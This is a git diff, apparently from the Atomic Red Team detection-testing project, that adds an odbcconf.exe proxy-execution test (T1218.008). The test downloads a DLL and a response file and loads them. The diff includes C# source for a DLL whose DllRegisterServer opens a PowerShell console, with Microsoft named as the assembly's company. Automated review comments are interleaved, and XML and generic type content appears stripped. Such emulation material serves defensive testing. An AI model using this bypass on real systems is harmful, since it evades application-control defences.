+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/o.dll" -OutFile "#{rsp_file_path}\o.dll"
+```
+
+
+
+
diff --git a/atomics/T1218.008/T1218.008.yaml b/atomics/T1218.008/T1218.008.yaml
index 5a7d6b34..662ff057 100644
--- a/atomics/T1218.008/T1218.008.yaml
+++ b/atomics/T1218.008/T1218.008.yaml
@@ -24,4 +24,34 @@ atomic_tests:
executor:
command: |
odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
- name: command_prompt
\ No newline at end of file
+ name: command_prompt
+- name: Odbcconf.exe - Load Response File
+ auto_generated_guid: 331ce274-f9c9-440b-9f8c-a1006e1fce0b
+ description: |
+ Execute arbitrary response file that will spawn PowerShell.exe.
+ Source files: https://github.com/woanware/application-restriction-bypasses
+ supported_platforms:
+ - windows
+ input_arguments:
+ rsp_file_name:
+ description: Response file name to load
+ type: String
+ default: T1218.008.rsp
+ rsp_file_path:
+ description: Response file path
+ type: String
+ default: PathToAtomicsFolder\T1218.008\bin\
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ T1218.008.rsp must exist on disk at specified location (#{rsp_file_path}#{rsp_file_name})
+ prereq_command: |
+ if (Test-Path #{rsp_file_path}#{rsp_file_name}) {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/T1218.008.rsp" -OutFile "#{rsp_file_path}#{rsp_file_name}"
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/o.dll" -OutFile "#{rsp_file_path}\o.dll"
+ executor:
+ command: |
+ cd #{rsp_file_path}
+ odbcconf.exe -f #{rsp_file_name}
+ name: command_prompt
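Review bot: The prereq check only tests for the response file, but the `.rsp` added in this commit contains `REGSVR o.dll`, so a run where only the first download succeeded passes the check and then fails inside odbcconf; check both files, e.g. `if ((Test-Path "#{rsp_file_path}#{rsp_file_name}") -and (Test-Path "#{rsp_file_path}o.dll")) {exit 0} else {exit 1}`, and mention o.dll in the dependency description. `Test-Path #{rsp_file_path}#{rsp_file_name}` and `cd #{rsp_file_path}` are unquoted, which breaks when PathToAtomicsFolder expands to a path with spaces; `cd /d "#{rsp_file_path}"` also makes the command work when the atomics folder is on a different drive. If o.dll is built from the Class1.cs source in this commit, its `DllRegisterServer` enters an interactive console loop, so the executor will not return on its own; a `cleanup_command` or a sentence in the description telling the operator to close the spawned odbcconf.exe console would help. The same text is mirrored in the T1218.008.md hunk above.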
diff --git a/atomics/T1218.008/bin/T1218.008.rsp b/atomics/T1218.008/bin/T1218.008.rsp
new file mode 100644
index 00000000..0e42d0b3
--- /dev/null
+++ b/atomics/T1218.008/bin/T1218.008.rsp
@@ -0,0 +1 @@
+REGSVR o.dll
\ No newline at end of file
diff --git a/atomics/T1218.008/bin/o.dll b/atomics/T1218.008/bin/o.dll
new file mode 100644
index 00000000..8b9d1a01
Binary files /dev/null and b/atomics/T1218.008/bin/o.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.20/Class1.cs b/atomics/T1218.008/src/odbcconf net.20/Class1.cs
new file mode 100644
index 00000000..e5abb7f9
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.20/Class1.cs
@@ -0,0 +1,77 @@
+// https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
+
+// odbcconf.exe /F file.rsp
+
+using System;
+using System.Runtime.InteropServices;
+using RGiesecke.DllExport;
+using System.Collections.ObjectModel;
+using System.Management.Automation;
+using System.Management.Automation.Runspaces;
+using System.Text;
+
+public class Test
+{
+
+ [DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
+ public static bool DllRegisterServer()
+ {
+ while (true)
+ {
+ AllocConsole();
+ IntPtr defaultStdout = new IntPtr(7);
+ IntPtr currentStdout = GetStdHandle(StdOutputHandle);
+ Console.Write("PS >");
+ string x = Console.ReadLine();
+ try
+ {
+ Console.WriteLine(RunPSCommand(x));
+ }
+ catch (Exception e)
+ {
+ Console.WriteLine(e.Message);
+ }
+ }
+ return true;
+ }
+ //Based on Jared Atkinson's And Justin Warner's Work
+ public static string RunPSCommand(string cmd)
+ {
+ //Init stuff
+ Runspace runspace = RunspaceFactory.CreateRunspace();
+ runspace.Open();
+ RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
+ Pipeline pipeline = runspace.CreatePipeline();
+
+ //Add commands
+ pipeline.Commands.AddScript(cmd);
+
+ //Prep PS for string output and invoke
+ pipeline.Commands.Add("Out-String");
+ Collection results = pipeline.Invoke();
+ runspace.Close();
+
+ //Convert records to strings
+ StringBuilder stringBuilder = new StringBuilder();
+ foreach (PSObject obj in results)
+ {
+ stringBuilder.Append(obj);
+ }
+ return stringBuilder.ToString().Trim();
+ }
+
+ public static void RunPSFile(string script)
+ {
+ PowerShell ps = PowerShell.Create();
+ ps.AddScript(script).Invoke();
+ }
+
+ private const UInt32 StdOutputHandle = 0xFFFFFFF5;
+ [DllImport("kernel32.dll")]
+ private static extern IntPtr GetStdHandle(UInt32 nStdHandle);
+ [DllImport("kernel32.dll")]
+ private static extern void SetStdHandle(UInt32 nStdHandle, IntPtr handle);
+ [DllImport("kernel32")]
+ static extern bool AllocConsole();
+
+}
\ No newline at end of file
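Review bot: `DllRegisterServer` never leaves `while (true)`, so `return true;` is unreachable and the host odbcconf.exe never returns to its caller; if that is the intent, say so in a comment, otherwise break out of the loop on an empty or `exit` line so the process can end cleanly. `defaultStdout` and `currentStdout` are assigned but never read, and `AllocConsole()` is called on every iteration although it can only succeed once per process — hoist `AllocConsole();` above the loop and drop the two unused handles. In `RunPSCommand`, `scriptInvoker` is created and never used, and `Collection results` appears to have lost its type argument in rendering (presumably `Collection<PSObject>`), which is worth confirming against the committed source.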
diff --git a/atomics/T1218.008/src/odbcconf net.20/Properties/AssemblyInfo.cs b/atomics/T1218.008/src/odbcconf net.20/Properties/AssemblyInfo.cs
new file mode 100644
index 00000000..d1ecc173
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.20/Properties/AssemblyInfo.cs
@@ -0,0 +1,36 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("odbcconf")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("Microsoft")]
+[assembly: AssemblyProduct("odbcconf")]
+[assembly: AssemblyCopyright("Copyright © Microsoft 2017")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible
+// to COM components. If you need to access a type in this assembly from
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+[assembly: Guid("8346cf2d-dbdf-4ffd-a4dc-4d51f1d8d3b9")]
+
+// Version information for an assembly consists of the following four values:
+//
+// Major Version
+// Minor Version
+// Build Number
+// Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]
diff --git a/atomics/T1218.008/src/odbcconf net.20/odbcconf.csproj b/atomics/T1218.008/src/odbcconf net.20/odbcconf.csproj
new file mode 100644
index 00000000..d294f7c7
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.20/odbcconf.csproj
@@ -0,0 +1,62 @@
+
+
+
+
+ Debug
+ AnyCPU
+ {8346CF2D-DBDF-4FFD-A4DC-4D51F1D8D3B9}
+ Library
+ Properties
+ odbcconf
+ oc
+ v2.0
+ 512
+
+
+
+ true
+ full
+ false
+ bin\Debug\
+ DEBUG;TRACE
+ prompt
+ 4
+ x64
+
+
+ pdbonly
+ true
+ bin\Release\
+ TRACE
+ prompt
+ 4
+
+
+
+ packages\UnmanagedExports.1.2.7\lib\net\RGiesecke.DllExport.Metadata.dll
+ False
+ True
+
+
+
+ False
+ ..\..\..\..\..\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/atomics/T1218.008/src/odbcconf net.20/odbcconf.sln b/atomics/T1218.008/src/odbcconf net.20/odbcconf.sln
new file mode 100644
index 00000000..f1afa906
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.20/odbcconf.sln
@@ -0,0 +1,22 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 14
+VisualStudioVersion = 14.0.25420.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "odbcconf", "odbcconf.csproj", "{8346CF2D-DBDF-4FFD-A4DC-4D51F1D8D3B9}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|Any CPU = Debug|Any CPU
+ Release|Any CPU = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {8346CF2D-DBDF-4FFD-A4DC-4D51F1D8D3B9}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {8346CF2D-DBDF-4FFD-A4DC-4D51F1D8D3B9}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {8346CF2D-DBDF-4FFD-A4DC-4D51F1D8D3B9}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {8346CF2D-DBDF-4FFD-A4DC-4D51F1D8D3B9}.Release|Any CPU.Build.0 = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+EndGlobal
diff --git a/atomics/T1218.008/src/odbcconf net.20/packages.config b/atomics/T1218.008/src/odbcconf net.20/packages.config
new file mode 100644
index 00000000..9fa2d188
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.20/packages.config
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file
diff --git a/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/UnmanagedExports.1.2.7.nupkg b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/UnmanagedExports.1.2.7.nupkg
new file mode 100644
index 00000000..ad4bc322
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/UnmanagedExports.1.2.7.nupkg differ
diff --git a/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/lib/net/RGiesecke.DllExport.Metadata.dll b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/lib/net/RGiesecke.DllExport.Metadata.dll
new file mode 100644
index 00000000..bec9cf62
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/lib/net/RGiesecke.DllExport.Metadata.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/DllExportCmdLets.psm1 b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/DllExportCmdLets.psm1
new file mode 100644
index 00000000..481afac8
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/DllExportCmdLets.psm1
@@ -0,0 +1,105 @@
+function Remove-OldDllExportFolder {
+ param($project)
+ $defaultFiles = ('DllExportAttribute.cs',
+ 'Mono.Cecil.dll',
+ 'RGiesecke.DllExport.dll',
+ 'RGiesecke.DllExport.pdb',
+ 'RGiesecke.DllExport.MSBuild.dll',
+ 'RGiesecke.DllExport.MSBuild.pdb',
+ 'RGiesecke.DllExport.targets')
+
+ $projectFile = New-Object 'System.IO.FileInfo'($project.FullName)
+
+ $projectFile.Directory.GetDirectories("DllExport") | Select-Object -First 1 | % {
+ $dllExportDir = $_
+
+ if($dllExportDir.GetDirectories().Count -eq 0){
+ $unknownFiles = $dllExportDir.GetFiles() | Select -ExpandProperty Name | ? { -not $defaultFiles -contains $_ }
+
+ if(-not $unknownFiles){
+ Write-Host "Removing 'DllExport' from " $project.Name
+ $project.ProjectItems | ? { $_.Name -ieq 'DllExport' } | % {
+ $_.Remove()
+ }
+
+ Write-Host "Deleting " $dllExportDir.FullName " ..."
+ $dllExportDir.Delete($true)
+ }
+ }
+ }
+}
+
+function Remove-OldDllExportFolders {
+ Get-Project -all | % {
+ Remove-OldDllExportFolder $_
+ }
+}
+
+function Get-DllExportMsBuildProjectsByFullName([String] $fullName) {
+ $msBuildV4Name = 'Microsoft.Build, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a';
+ $msBuildV4 = [System.Reflection.Assembly]::LoadWithPartialName($msBuildV4Name)
+
+ if(!$msBuildV4) {
+ throw New-Object 'System.IO.FileNotFoundException'("Could not load $msBuildV4Name.")
+ }
+
+ $projectCollection = $msBuildV4.GetType('Microsoft.Build.Evaluation.ProjectCollection')
+
+ return $projectCollection::GlobalProjectCollection.GetLoadedProjects($fullName)
+}
+
+function Get-AllDllExportMsBuildProjects {
+ (Get-Project -all | % {
+ Get-DllExportMsBuildProjectsByFullName $_.FullName
+ }) | ? {
+ return ($_.Xml.Imports | ? {
+ "RGiesecke.DllExport.targets" -ieq [System.IO.Path]::GetFileName($_.Project);
+ }).Length -gt 0;
+ }
+}
+
+function Assert-PlatformTargetOfProject([String] $fullName) {
+ $proj = Get-DllExportMsBuildProjectsByFullName $fullName
+
+ if(!$proj) {
+ return;
+ }
+
+ $platformTarget = $proj.GetPropertyValue('PlatformTarget');
+
+ if(!$platformTarget -or ($platformTarget -ine 'x86' -and $platformTarget -ine 'x64')) {
+ $projectName = [IO.Path]::GetFileNameWithoutExtension($fullName);
+ if(!$platformTarget) {
+ $platformTarget = "has no platform target";
+ } else {
+ $platformTarget = "has a platform target of '$platformTarget'";
+ }
+ Write-Warning "The project '$projectName' $platformTarget. Only x86 or x64 assemblies can export functions."
+ Write-Host ""
+ }
+}
+
+function Set-NoDllExportsForAnyCpu([String] $projectName, [System.Nullable[bool]] $value) {
+ $projects = Get-AllDllExportMsBuildProjects;
+
+ [String] $asString = $value;
+
+ if($projectName) {
+ $projects = $projects | where { $_.Name -ieq $projectName };
+ }
+ $propertyName = 'NoDllExportsForAnyCpu';
+
+ $projects = $projects | where {
+ $_.GetPropertyValue($propertyName) -ine $asString
+ } | % {
+ $_.SetProperty($propertyName, $asString);
+ }
+}
+
+Export-ModuleMember Set-NoDllExportsForAnyCpu
+
+Export-ModuleMember Remove-OldDllExportFolder
+Export-ModuleMember Remove-OldDllExportFolders
+Export-ModuleMember Get-DllExportMsBuildProjectsByFullName
+Export-ModuleMember Get-AllDllExportMsBuildProjects
+Export-ModuleMember Assert-PlatformTargetOfProject
\ No newline at end of file
diff --git a/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/Mono.Cecil.dll b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/Mono.Cecil.dll
new file mode 100644
index 00000000..8cf15a12
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/Mono.Cecil.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.MSBuild.dll b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.MSBuild.dll
new file mode 100644
index 00000000..ba22ab10
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.MSBuild.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.MSBuild.pdb b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.MSBuild.pdb
new file mode 100644
index 00000000..79a2a6cb
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.MSBuild.pdb differ
diff --git a/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.dll b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.dll
new file mode 100644
index 00000000..5a77fe73
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.pdb b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.pdb
new file mode 100644
index 00000000..e0e571ab
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.pdb differ
diff --git a/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.targets b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.targets
new file mode 100644
index 00000000..dd63ee1f
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.targets
@@ -0,0 +1,75 @@
+
+
+
+
+
+ $(PostBuildEventDependsOn);
+ RGieseckeDllExport
+
+
+
+
+
+ $(BuildDependsOn);
+ RGieseckeDllExport
+
+
+
+
+
+
+
+
+
+
+
+ RGiesecke.DllExport.DllExportAttribute
+ RGiesecke.DllExport.Metadata
+
+ $(Platform)
+ $(PlatformTarget)
+ $(CpuType)
+ $(DebugSymbols)
+ false
+ $(DllExportTimeout)
+ $(KeyContainerName)$(AssemblyKeyContainerName)
+ $(KeyOriginatorFile)
+ $(MSBuildProjectDirectory)
+ $(TargetPath)
+ $(TargetedFrameworkDir);$(TargetFrameworkDirectory)
+ $(DevEnvDir)\..\..\VC\bin
+ $(DevEnvDir)
+ $(TargetFrameworkVersion)
+ $(TargetFrameworkSDKToolsDirectory)
+ $(NoDllExportsForAnyCpu)
+
+
+
+
+
\ No newline at end of file
diff --git a/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/init.ps1 b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/init.ps1
new file mode 100644
index 00000000..03ebad40
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/init.ps1
@@ -0,0 +1,12 @@
+param($installPath, $toolsPath, $package, $project)
+
+Import-Module (Join-Path $toolsPath DllExportCmdLets.psm1)
+
+if($project) {
+ Assert-PlatformTargetOfProject $project.FullName
+}
+else {
+ Get-AllDllExportMsBuildProjects | % {
+ Assert-PlatformTargetOfProject $_.FullPath
+ }
+}
\ No newline at end of file
diff --git a/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/install.ps1 b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/install.ps1
new file mode 100644
index 00000000..3f4cefd6
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/install.ps1
@@ -0,0 +1,52 @@
+param($installPath, $toolsPath, $package, $project)
+
+$targetFileName = 'RGiesecke.DllExport.targets'
+$targetFileName = [IO.Path]::Combine($toolsPath, $targetFileName)
+$targetUri = New-Object Uri -ArgumentList $targetFileName, [UriKind]::Absolute
+
+$msBuildV4Name = 'Microsoft.Build, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a';
+$msBuildV4 = [System.Reflection.Assembly]::LoadWithPartialName($msBuildV4Name)
+
+if(!$msBuildV4) {
+ throw New-Object System.IO.FileNotFoundException("Could not load $msBuildV4Name.");
+}
+
+$projectCollection = $msBuildV4.GetType('Microsoft.Build.Evaluation.ProjectCollection')
+
+# change the reference to RGiesecke.DllExport.Metadata.dll to not be copied locally
+
+$project.Object.References | ? {
+ $_.Name -ieq "RGiesecke.DllExport.Metadata"
+} | % {
+ if($_ | Get-Member | ? {$_.Name -eq "CopyLocal"}){
+ $_.CopyLocal = $false
+ }
+}
+
+$projects = $projectCollection::GlobalProjectCollection.GetLoadedProjects($project.FullName)
+$projects | % {
+ $currentProject = $_
+
+ # remove imports of RGiesecke.DllExport.targets from this project
+ $currentProject.Xml.Imports | ? {
+ return ("RGiesecke.DllExport.targets" -ieq [IO.Path]::GetFileName($_.Project))
+ } | % {
+ $currentProject.Xml.RemoveChild($_);
+ }
+
+ # remove the properties DllExportAttributeFullName and DllExportAttributeAssemblyName
+ $currentProject.Xml.Properties | ? {
+ $_.Name -eq "DllExportAttributeFullName" -or $_.Name -eq "DllExportAttributeAssemblyName"
+ } | % {
+ $_.Parent.RemoveChild($_)
+ }
+
+ $projectUri = New-Object Uri -ArgumentList $currentProject.FullPath, [UriKind]::Absolute
+ $relativeUrl = $projectUri.MakeRelative($targetUri)
+ $import = $currentProject.Xml.AddImport($relativeUrl)
+ $import.Condition = "Exists('$relativeUrl')";
+
+ # remove the old stuff in the DllExports folder from previous versions, (will check that only known files are in it)
+ Remove-OldDllExportFolder $project
+ Assert-PlatformTargetOfProject $project.FullName
+}
\ No newline at end of file
diff --git a/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/uninstall.ps1 b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/uninstall.ps1
new file mode 100644
index 00000000..cc535aef
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/uninstall.ps1
@@ -0,0 +1,17 @@
+param($installPath, $toolsPath, $package, $project)
+
+$targetFileName = 'RGiesecke.DllExport.targets'
+$targetFileName = [System.IO.Path]::Combine($toolsPath, $targetFileName)
+$targetUri = New-Object Uri($targetFileName, [UriKind]::Absolute)
+
+$projects = Get-DllExportMsBuildProjectsByFullName($project.FullName)
+
+return $projects | % {
+ $currentProject = $_
+
+ $currentProject.Xml.Imports | ? {
+ "RGiesecke.DllExport.targets" -ieq [System.IO.Path]::GetFileName($_.Project)
+ } | % {
+ $currentProject.Xml.RemoveChild($_)
+ }
+}
\ No newline at end of file
diff --git a/atomics/T1218.008/src/odbcconf net.40/Class1.cs b/atomics/T1218.008/src/odbcconf net.40/Class1.cs
new file mode 100644
index 00000000..5ce28407
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/Class1.cs
@@ -0,0 +1,75 @@
+//odbcconf.exe /F file.rsp
+
+using System;
+using System.Runtime.InteropServices;
+using System.Collections.ObjectModel;
+using System.Management.Automation;
+using System.Management.Automation.Runspaces;
+using System.Text;
+using odbc;
+
+public class Test
+{
+
+ [DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
+ public static bool DllRegisterServer()
+ {
+ while (true)
+ {
+ AllocConsole();
+ IntPtr defaultStdout = new IntPtr(7);
+ IntPtr currentStdout = GetStdHandle(StdOutputHandle);
+ Console.Write("PS >");
+ string x = Console.ReadLine();
+ try
+ {
+ Console.WriteLine(RunPSCommand(x));
+ }
+ catch (Exception e)
+ {
+ Console.WriteLine(e.Message);
+ }
+ }
+ return true;
+ }
+ //Based on Jared Atkinson's And Justin Warner's Work
+ public static string RunPSCommand(string cmd)
+ {
+ //Init stuff
+ Runspace runspace = RunspaceFactory.CreateRunspace();
+ runspace.Open();
+ RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
+ Pipeline pipeline = runspace.CreatePipeline();
+
+ //Add commands
+ pipeline.Commands.AddScript(cmd);
+
+ //Prep PS for string output and invoke
+ pipeline.Commands.Add("Out-String");
+ Collection results = pipeline.Invoke();
+ runspace.Close();
+
+ //Convert records to strings
+ StringBuilder stringBuilder = new StringBuilder();
+ foreach (PSObject obj in results)
+ {
+ stringBuilder.Append(obj.ToString().TrimEnd('\r', '\n'));
+ }
+ return stringBuilder.ToString().Trim();
+ }
+
+ public static void RunPSFile(string script)
+ {
+ PowerShell ps = PowerShell.Create();
+ ps.AddScript(script).Invoke();
+ }
+
+ private const UInt32 StdOutputHandle = 0xFFFFFFF5;
+ [DllImport("kernel32.dll")]
+ private static extern IntPtr GetStdHandle(UInt32 nStdHandle);
+ [DllImport("kernel32.dll")]
+ private static extern void SetStdHandle(UInt32 nStdHandle, IntPtr handle);
+ [DllImport("kernel32")]
+ static extern bool AllocConsole();
+
+}
\ No newline at end of file
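Review bot: `Console.ReadLine()` in `DllRegisterServer` is never checked for null, so when stdin is closed or redirected (an unattended atomic run) the `while (true)` loop passes null to `RunPSCommand`, `AddScript(null)` throws, the catch prints the message and the loop spins forever, and the `return true;` after the loop stays unreachable. Add `if (x == null) break;` directly after the read so the export returns to odbcconf.exe on EOF, and hoist `AllocConsole();` above the loop since it only succeeds once a console is not yet attached. `defaultStdout`, `currentStdout` and the `SetStdHandle` import are dead and can be dropped. `Collection results = pipeline.Invoke();` looks like `Collection<PSObject>` with the type argument lost in rendering, as the angle-bracket content of the XML files in this commit was; worth confirming against the checked-in file. `runspace.Close()` is also skipped when `Invoke()` throws, so wrapping the runspace and pipeline in `using` blocks would avoid leaking them across iterations.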
diff --git a/atomics/T1218.008/src/odbcconf net.40/Properties/AssemblyInfo.cs b/atomics/T1218.008/src/odbcconf net.40/Properties/AssemblyInfo.cs
new file mode 100644
index 00000000..038a74d5
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/Properties/AssemblyInfo.cs
@@ -0,0 +1,36 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("odbc")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("odbc")]
+[assembly: AssemblyCopyright("Copyright © 2017")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible
+// to COM components. If you need to access a type in this assembly from
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+[assembly: Guid("12614e54-5c05-4278-8f76-f1940f87a352")]
+
+// Version information for an assembly consists of the following four values:
+//
+// Major Version
+// Minor Version
+// Build Number
+// Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]
diff --git a/atomics/T1218.008/src/odbcconf net.40/odbcconf.csproj b/atomics/T1218.008/src/odbcconf net.40/odbcconf.csproj
new file mode 100644
index 00000000..95726f10
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/odbcconf.csproj
@@ -0,0 +1,63 @@
+
+
+
+
+ Debug
+ AnyCPU
+ {12614E54-5C05-4278-8F76-F1940F87A352}
+ Library
+ Properties
+ odbc
+ odbc
+ v4.5
+ 512
+
+ odbc
+ true
+ 1
+ false
+ false
+
+
+ true
+ full
+ false
+ bin\Debug\
+ DEBUG;TRACE
+ prompt
+ 4
+ x64
+ false
+
+
+ pdbonly
+ true
+ bin\Release\
+ TRACE
+ prompt
+ 4
+ false
+
+
+
+ packages\DllExport.1.5.2\lib\net20\DllExport.dll
+ False
+
+
+
+
+ False
+ ..\..\..\..\..\..\Program Files (x86)\Reference Assemblies\Microsoft\WindowsPowerShell\3.0\System.Management.Automation.dll
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/atomics/T1218.008/src/odbcconf net.40/odbcconf.sln b/atomics/T1218.008/src/odbcconf net.40/odbcconf.sln
new file mode 100644
index 00000000..e1c982f9
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/odbcconf.sln
@@ -0,0 +1,22 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 15
+VisualStudioVersion = 15.0.26228.4
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "odbcconf", "odbcconf.csproj", "{12614E54-5C05-4278-8F76-F1940F87A352}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|Any CPU = Debug|Any CPU
+ Release|Any CPU = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {12614E54-5C05-4278-8F76-F1940F87A352}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {12614E54-5C05-4278-8F76-F1940F87A352}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {12614E54-5C05-4278-8F76-F1940F87A352}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {12614E54-5C05-4278-8F76-F1940F87A352}.Release|Any CPU.Build.0 = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+EndGlobal
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages.config b/atomics/T1218.008/src/odbcconf net.40/packages.config
new file mode 100644
index 00000000..2cfa733e
